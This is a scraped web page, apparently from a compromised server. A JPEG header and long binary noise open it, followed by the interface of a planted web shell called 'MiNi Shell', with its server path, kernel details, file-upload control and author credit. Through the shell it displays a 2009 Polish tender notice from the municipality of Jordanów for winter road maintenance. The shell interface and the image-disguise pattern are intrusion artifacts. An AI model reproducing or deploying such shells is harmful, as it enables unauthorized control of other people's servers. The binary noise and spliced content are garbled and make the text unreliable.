JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091009/353180-N-2009.html

<p class="kh_header"><b>Jordanów: Zimowe utrzymanie dróg gminnych w sezonie zimowym 2009-2010 na terenie gminy Jordanów.</b><br>
<b>Numer ogłoszenia: 353180 - 2009; data zamieszczenia: 09.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jordanów , ul. Rynek 2, 34-240 Jordanów, woj. małopolskie, tel. 018 2693510, faks 018 2693526.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg gminnych w sezonie zimowym 2009-2010 na terenie gminy Jordanów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
1/ Przedmiot zamówienia stanowi z uwzględnieniem postanowień art. 2 pkt 8 oraz art. 30 ustawy Prawo zamówień publicznych : zimowe utrzymanie dróg gminnych w sezonie zimowym 2009-2010 na terenie gminy Jordanów
2/ Zakres usług obejmuje:
     - odśnieżanie jezdni na całej szerokości
     - odśnieżanie poboczy i chodników oraz obiektów towarzyszących w tym przystanków komunikacji zbiorowej i 
       skrzyżowań 
     - posypywanie jezdni na odcinkach decydujących o ruchu, a w szczególności odcinkach położonych o pochyleniu 
       powyżej 4%, skrzyżowań, obiektów mostowych, przystanków komunikacji zbiorowej, niebezpieczne łuki poziome
     - w przypadku wystąpienia lodowicy spowodowanej opadami marznącej mżawki posypywanie dróg całej długości     - 
     - materiał do posypywania zabezpiecza na koszt własny Zleceniobiorca (Wykonawca)
     - usunięcie materiału uszorstniającego, zalegającego na jezdniach i poboczach dróg po zakończeniu sezonu 
       zimowego. 
Drogi objęte zimowym utrzymaniem dróg w IV standardzie:
- droga  Naprawa przez Wieś długości - 5360 m 
- Naprawa -droga Dyrdołowa długości - 810 m
- Drogi objęte zimowym utrzymaniem dróg w VI standardzie:
- Łętownia - droga Zembolowa - 1630 m
- Łętownia - droga do Domu Pomocy Społecznej -760 m
- Wysoka  - droga Skawska - 2500 m
  Ogólna  ilość - 11 060 m.
Szczegółowy zakres prac został określony w kosztorysie ofertowym stanowiącym załącznik nr 2 do SIWZ
oraz w szczegółowej specyfikacji technicznej na wykonanie usług związanych z zimowym utrzymaniem dróg gminnych na terenie gminy Jordanów w sezonie zimowym 2009-2010. Zamawiający zastrzega sobie prawo do zmiany zakresu robót określonych kosztorysem ofertowym.
 
3/ Wykonawca zobowiązany jest wskazać część zamówienia, którą zamierza  zlecić podwykonawcom..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Warunki udziału w postępowaniu

W przetargu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli   
     ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzą i doświadczenie oraz dysponują  potencjałem technicznym  
    i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do   
    udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3) znajdują się w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie 
    zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Sposób dokonania oceny spełnienia warunków z pkt . 1:
ad. 1) warunek spełnią wykonawcy, którzy prowadzą działalność gospodarczą zgodną z przedmiotem zamówienia,
ad. 2) warunek spełnią wykonawcy, którzy w okresie ostatnich trzech lat przed wszczęciem postępowania wykonali 
         samodzielnie należycie minimum jedną robotę o wartości 60  000, 00 zł odpowiadającą swoim rodzajem  
        usługom stanowiącym  przedmiot  zamówienia i posiadają dokumenty (referencje) potwierdzające, że usługi te 
        zostały wykonane należycie.
          Dysponują odpowiednim sprzętem i osobami  z posiadanymi uprawnieniami do obsługi n/w sprzętu:
- pługo-piaskarki na pojazdach samochodowych szt 1
- pług z ciągnikiem kołowym szt 1
- koparko-ładowarka szt 1
- rozrzutnik do ciągnika szt 1
ad. 3) warunek ten spełnią Wykonawcy, którzy posiadają środki finansowe zapewniające wykonanie przedmiotu  
         zamówienia ,       
ad. 4) warunek spełnią wykonawcy, którzy załączą oświadczenie o spełnieniu warunków udziału w postępowaniu
          i dokumenty wymienione w pkt. 2. 
 
Uwaga:
Zamawiający wykluczy z postępowania Wykonawców, którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem, sądu wydanym w okresie 3 lat przed wszczęciem postępowania  oraz jeżeli stwierdzi, że dostarczone przez niego informacje istotne dla prowadzonego postępowania są nieprawdziwe..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca zobowiązany jest złożyć w terminie wskazanym w Części VII pkt . 1 i formie określonej w Części VI SIWZ:

1) Ofertę na formularzu oferty, o  treści zgodnej z określoną we wzorze - stanowiącym 
    załącznik Nr 1  do SIWZ
2) Oświadczenia oraz dokumenty potwierdzające spełnianie warunków:
 a) Dokument potwierdzający dopuszczenie Wykonawcę do obrotu prawnego w  
     zakresie objętym zamówieniem - aktualny odpis z właściwego rejestru albo 
     aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione  
     nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentu, o którym mowa powyżej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument o mowa, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, których mowa , zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Wymagania co do daty wystawienia stosuje się odpowiednio. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
b)Oświadczenie  o treści określonej w art. 22 ust. 1 oraz art. 24 ust. 1  i 2  ustawy Prawo zamówień publicznych - wg wzoru  określonego w załączniku Nr 2 do SIWZ .
Sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. 
c)Wykaz wykonanej samodzielnie co najmniej jednej usługi o wartości minimum 60 000,00 zł w ciągu ostatnich trzech  lat,  a jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie odpowiadającym swoim rodzajem  usługom stanowiącym   przedmiot zamówienia, z podaniem ich wartości   oraz daty    wykonania oraz odbiorów   wraz  z załączeniem dokumentów potwierdzających, że  usługi te zostały wykonane należycie    - wg  wzoru stanowiącego załącznik Nr 3 ,
d)Wykaz osób , którymi dysponuje lub będzie  dysponował  Wykonawca i które będą  
   uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji 
   zawodowych w    wykonaniu  zamówienia wraz z załącznikami uprawnieniami   
   w/g wzoru stanowiącego załącznik Nr 4.
  Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania 
  zamówienia, jeżeli w wykazie, o którym mowa w tym punkcie, wykonawca wskazał osoby, 
  którymi będzie dysponował załączniki  nr 4a i 4b.
   Uwaga:
Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium  Rzeczypospolitej  Polskiej powinien złożyć dokumenty  zgodnie  z  § 2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 7 kwietnia 2004 r ( D. U. z  2004, Nr 71,poz. 646 ). Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.  

3) Parafowany wzór umowy jako akceptacji jej treści i warunków wg załącznika Nr 5 do SIWZ.
4) kosztorys ofertowy uproszczony zgodny z podanym zakresem usługi..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www. gmina-jordanow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Gminy w Jordanowie
ul. Rynek 2
34-240 Jordanów
pokój nr 12, II piętro za cenę 15 zł w godzinach 7 : 30 do 15 : 30.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.10.2009 godzina 10:00, miejsce: Urzad Gminy w Jordanowie
ul. Rynek 2
34-240 Jordanów
pokój nr 12, II piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com